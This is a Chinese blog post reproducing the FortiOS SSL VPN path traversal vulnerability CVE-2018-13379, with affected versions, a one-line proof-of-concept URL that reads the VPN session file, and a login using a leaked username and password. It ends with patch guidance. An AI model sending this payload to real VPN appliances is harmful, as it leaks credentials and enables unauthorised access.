Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

最新推荐文章于 2023-03-14 17:53:22 发布
最新推荐文章于 2023-03-14 17:53:22 发布 5598 收藏 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limb0/article/details/102890683
版权

Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

一、漏洞介绍

Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、VPN、Web内容过滤和反垃圾邮件等多种安全功能。在2019年blackhat上,安全研究人员公布了Fortinet FortiOS多个漏洞,包括Fortinet FortiOS路径遍历漏洞(CNNVD-201905-1026、CVE-2018-13379)、Fortinet FortiOS 跨站脚本漏洞(CNNVD-201905-1024、CVE-2018-13380)、Fortinet FortiOS 缓冲区错误漏洞(CNNVD-201905-878、CVE-2018-13381)(CNNVD-201904-116、CVE-2018-13383)、Fortinet FortiOS授权问题漏洞(CNNVD-201905-1025、CVE-2018-13382)等。成功利用漏洞的攻击者,可在未经身份验证的情况下获取用户账号敏感信息,修改账号密码,从而最终控制目标系统。

二、漏洞危害

Fortinet FortiOS路径遍历漏洞(CNNVD-201905-1026、CVE-2018-13379)
漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。

三、漏洞验证

POC:https://192.168.1.1:4443/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession
在这里插入图片描述
利用泄露的账户herschel/vvpn123成功登陆。
在这里插入图片描述
在这里插入图片描述

四、漏洞修复

目前,Fortigate官方已发布升级补丁修复了该漏洞,建议用户尽快将Fontigate升级到FortiOS 5.4.11、5.6.9、6.0.5、6.2.0或更高版本,从而修补漏洞带来的危害。官方补丁链接如下:
https://fortiguard.com/psirt/FG-IR-18-384

参考链接:
https://www.cnblogs.com/dgjnszf/p/11355242.html
http://www.fangyuba.com/news/broadcast/492.htm
https://www.venustech.com.cn/article/1/9891.html
检测工具:
https://github.com/milo2012/CVE-2018-13379

limb0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
实验室:用于安全性分析的漏洞实验室
02-05
名称 描述 CVE-2015-5531 1.6.1之前的Elasticsearch中的目录遍历漏洞允许远程攻击者通过与快照API调用相关的未指定向量读取任意文件。 CVE-2016-1909 5.0.12之前的Fortinet FortiAnalyzer和5.2.5之前的5.2.x; 3.3.3之前的FortiSwitch 3.3.x; 3.0.8之前的FortiCache 3.0.x; 和FortiOS 4.1.x之前的4.1.x,4.2.16之前的4.2.x,4.3.17之前的4.3.x和5.0.8之前的5.0.x具有Fortimanager_Access帐户的硬编码密码,这使远程攻
美英澳联合发布2020-2021期间遭利用最多的 Top 30漏洞
smellycat000的专栏
07-29 233
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士澳大利亚、英国和美国的网络安全机构联合发布安全公告,列出了2020年至2021年间遭利用次数最多的安全缺陷。澳大利亚网络安全中心 ...
Fortinet FortiOS漏洞被用于攻击政府实体
最新发布
smellycat000的专栏
03-14 961
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士未知威胁组织正在利用Fortinet FortiOS 中的一个0day漏洞 (CVE-2022-41328),攻击政府实体和大型组织机构,窃取数据并损坏操作系统和文件。Fortinet公司的研究员 Guillaume Lovet和Alex Kong 在上周发布的安全公告中指出,“利用的复杂度表明攻击者是高阶攻击者,并且正在高度集中攻击政府或与政府...
Fortinet FortiOS 路径遍历漏洞(CVE-2018-13379
mei_13的博客
07-08 3363
1 漏洞简介 早在2019年5月24日,飞塔官方就发布了CVE-2018-13379漏洞的安全公告,但直到8月份才有漏洞Exp流出,导致漏洞蔓延。 据官方介绍,CVE-2018-13379是SSL VPN中的一个目录遍历漏洞,该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可利用该漏洞访问受限目录之外的文件。 受影响的版本: FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4 2 环境搭建 使用FOFA中搜索飞塔SSL VPN服务器,
基于ATT&CK框架解析勒索病毒攻击
weixin_46564680的博客
03-15 886
ATT&CK框架1. 初始访问阶段2. 执行阶段3. 持久化阶段4. 提升权限阶段5. 防御绕过阶段6. 凭证访问阶段7. 发现阶段8. 横向移动阶段9. 收集阶段10. 命令与控制阶段11. 数据渗透阶段12. 影响阶段13. 总结 ATT&CK是一个图形化攻击框架,这个框架里面的内容其实就是根据各种不同的流行恶意软件攻击技术以及黑客攻击活动总结而来的,下面我们来介绍勒索病毒黑客组织在利用勒索病毒攻击的时候,在ATT&CK框架的各个不同的阶段使用的一些常用的攻击技术和攻击流程。 1
ssl漏洞复现
里查叔叔
01-03 120
GET请求改地址,可查看用户名 密码说明存在漏洞
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 4610
正入万山圈子里,一山放过一山拦。
CVE-2018-13382 环境搭建+漏洞复现
yxngu
07-30 1016
芝兰生于深山,不以无人而不芳
简单聊聊CVE-2020-13379
一个安全研究员
08-04 7434
多次跳转导致的ssrf
网络靶场实战--飞塔(Fortinet)防火墙认证绕过漏洞(CVE-2022-40684)
蛇矛实验室
12-13 1331
我们这一小节简单了解了身份认证绕过流程,分析并复现了fortigate防火墙身份认证绕过漏洞的形成过程以及如何利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
最新系统漏洞--Fortinet FortiGate跨站脚本漏洞
weixin_48555088的博客
10-23 1085
最新系统漏洞2021年10月22日 受影响系统: Fortinet FortiGate <= 6.4.1 Fortinet FortiGate 6.2.2 <= Version <= 6.2.5 描述: CVE(CAN) ID: CVE-2020-15937 Fortinet FortiGate是美国飞塔(Fortinet)公司的一套网络安全平台。该平台提供防火墙、防病毒和入侵防御(IPS)、应用控制、反垃圾邮件、无线控制器和广域网加速等功能。 FortiGate 6.2.2-6.2.5版
漏洞复现篇
热门推荐
yy
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径
俄罗斯被指为 SolarWinds 供应链事件元凶,技术公司受制裁,常用5大漏洞遭曝光...
smellycat000的专栏
04-16 527
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码安全卫士今天,美国政府宣布对俄罗斯政府实施一系列制裁措施,正式将 SolarWinds Orion 供应链攻击归咎于俄罗斯联邦对外情报...
漏洞威胁分析报告(上册)- 不同视角下的漏洞威胁
further_eye的博客
03-09 1552
前言 刚刚过去的2020年以极具戏剧性的开场和魔幻现实主义的中章,给传统行业当头一棒,疫情的延伸早已超出了绝大部分人的预料。传统行业被迫转型;企业被迫选择线上办公;学校被迫开设网课。在经济体系运作如此困难的情况下,互联网行业在整个市场却占据更稳定的位置,互联网行业飞速发展的同时也带来了前所未有的网络安全挑战。 热爱网络安全的年轻人们,经历了停工、停学,却从未停下漏洞研究的脚步,据统计,2020年新增20086条漏洞信息(来源于cnvd),相较于2019年,漏洞环比增长125.1%。 产品...
Fortinet修复两个严重的RCE漏洞,其中一个两年前就发现?
smellycat000的专栏
02-20 1101
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全公司 Fortinet 发布安全更新,修复FortiNAC和FortiWeb 产品中的两个严重漏洞CVE-2022-39952和CVE-2021-42756),它们可导致未认证攻击者执行任意代码或执行命令。第一个漏洞CVE-2022-39952影响FortiNAC,CVSS v3评分为9.8。FortiNAC 是一个网络访问控制解决方案...
OpenSSH用户枚举漏洞poc(CVE-2018-15473)
大哥一声吼
08-24 1万+
漏洞简介:通过向OpenSSH服务器发送一个错误格式的公钥认证请求,可以判断是否存在特定的用户名。如果用户名不存在,那么服务器会发给客户端一个验证失败的消息。如果用户名存在,那么将因为解析失败,不返回任何信息,直接中断通讯。     重要部分,poc下载地址:https://download.csdn.net/download/helloexp/10625075...
Fortinet FortiGate CRLF字符URL过滤绕过漏洞
瞎几把学
09-10 2269
发布时间:2008-1-16 15:15:03 文章作者:ADLab 文章来源:启明星辰   BUGTRAQ ID: 27276 CNCAN ID:CNCAN-2008011605 漏洞消息时间:2008-01-14 漏洞起因 设计错误 影响系统 Fortinet FortiGate-1000 3.00 不受影响系统 危害 远程
教程篇(5.4) 17. 入侵防御 ❀ FortiGate 安全 ❀ Fortinet 网络安全专家 NSE 4
防火墙技术专栏
11-23 2137
在这节课中你将学习如何使用FortiGate来保护你的网络不受入侵和拒绝服务攻击。 在完成这一课程之后,你应该具备使用IPS、拒绝服务(DoS)策略和web应用防火墙配置文件来检测和阻止已知的攻击和网络异常的实际技能。  这一课还包括了一个单臂嗅探器的部署。 在我们开始之前,了解异常和攻击之间的区别是很重要的。同样重要的是要知道哪些FortiGate提供了对这两种类型的威胁的保护。  攻击是已知...
CVE-2020-14882/14883: Weblogic ConSole HTTP 协议代码执行漏洞通告
爱国小白帽
10-29 3389
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-29 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC已经公开,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HT
写一份替换防火墙的项目经历
02-19
我曾多次为客户安装和替换防火墙。我熟悉多种品牌的防火墙,包括Cisco,Juniper,Checkpoint,Fortinet和Palo Alto等,并能够设置安全策略,实施网络安全控制等。我还参与了配置安全内容管理系统,实施主机安全策略,检查服务器漏洞并制定补丁策略,以及配置访问控制系统等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

limb0

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值